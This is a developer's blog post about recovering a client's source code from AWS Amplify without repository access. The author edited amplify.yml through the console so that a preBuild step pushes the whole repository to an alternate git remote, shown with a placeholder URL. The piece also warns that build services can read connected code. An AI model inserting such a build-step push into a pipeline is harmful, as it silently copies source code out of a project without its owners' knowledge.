Abílio Azevedo.

The day I recovered the company's source code

Cover Image for The day I recovered the company's source code
Abílio Azevedo
Abílio Azevedo

I wrote this article for the Revelo community. You can access it in portuguese here. English version is below.

TLDR

This article details the experience of recovering lost source code from a company that was connected to AWS Amplify. By changing the amplify.yml file, it was possible to push the source code to a Git repository during the build process. We will explore how Amplify works, focusing on security aspects and detailing how the source code is exposed at build time.

As developers, we go through some hassles on a daily basis: a company contacted me to do some freelance "small tweaks" service, but they didn't have access to the source code developed by the previous developer 😅. So, would you take on the project? Tell them to start from scratch? Try to recover the source code?

Scenario

The source code was hosted on GitHub and hosted on AWS through Amplify. We didn't have access to the repository, but we had access to the AWS dashboard.

Theory

At some point the code leaves GitHub and goes to AWS to be built and hosted. So we can have access, there is light at the end of the tunnel!

What is AWS Amplify?

AWS Amplify is a set of tools and services that allow developers to build scalable and secure applications in the cloud. It provides an easy-to-use interface to manage backend and frontend resources, including authentication, APIs, storage, and hosting.

You can start using Amplify by setting up a repository for your source code.

Amplify hosting

Notice that you need to authorize AWS Amplify to read your code and write the amplify.yml file which will control the build and deploy process in Amplify and can be customized to meet specific project needs.

Amplify Instalation

Source Code Recovery

As we have seen, the source code is exposed to AWS Amplify so that the build process can be done. In other words, don't go connecting your repository anywhere and any account. In this case, the previous developer who was providing service believed his code was inaccessible. However, we know this is not true.

The build settings are in a yml file and can be modified by the AWS dashboard or by the repository itself, as we can see in the following image:

Amplify Build

As I didn't have access to the repository, I modified this file through the AWS dashboard that the company had access to, and included a step before the build that sent all code to an empty git repository, thus maintaining the entire history of code changes.

version: 1
frontend:
  phases:
preBuild:
  commands:
    - echo 'Enviando código fonte para o repositório Git alternativo'
    - git remote add alternate-repo <URL_DO_REPOSITÓRIO_ALTERNATIVO>
    - git push alternate-repo master

With this we found out that the developer was outsourcing the service to someone else 🤡.

Note: If outsourcing was authorized in the contract, everything is fine. The guy went silent when he found out we were able to access the source code. But that's it folks, pay attention to the possibilities, understand how the tools work and their concepts so you can use them in the best way and get out of hassles like this, always ethically.

That is All Folks


More posts

Cover Image for The 4-Hour Work Week

The 4-Hour Work Week

**The 4-Hour Work Week** is a groundbreaking guide to escaping the 9-5 grind, automating your income, and living life on your own terms. Bestselling author Tim Ferriss shares revolutionary strategies for outsourcing, remote work, lifestyle design, and building automated businesses that generate passive income. Learn how to join the 'New Rich' who leverage time and mobility instead of trading time for money. This influential book has transformed how millions approach work and life balance in the digital age.

Abílio Azevedo
Abílio Azevedo
Cover Image for The Phychology of Money

The Phychology of Money

Morgan Housel offers valuable insights on financial management and decision-making. The author emphasizes that financial success depends more on behavior than on intelligence or technical knowledge. Housel highlights the importance of long-term vision and resilience in the face of market volatility, encouraging us to focus on sustainability rather than short-term gains.

NewsLetter

I will send the content posted here. No Spam =)

Experienced Software Engineer with degree in Electrical Engineering with over 10 years of hands-on expertise in building robust and scalable mobile, web and backend applications across various projects mainly in the fintech sector. Mobile (React Native), Web (React and Next.JS) and Backend (Node.JS, PHP and DJANGO). My goal is to create products that add value to people. - © 2024, Abílio Azevedo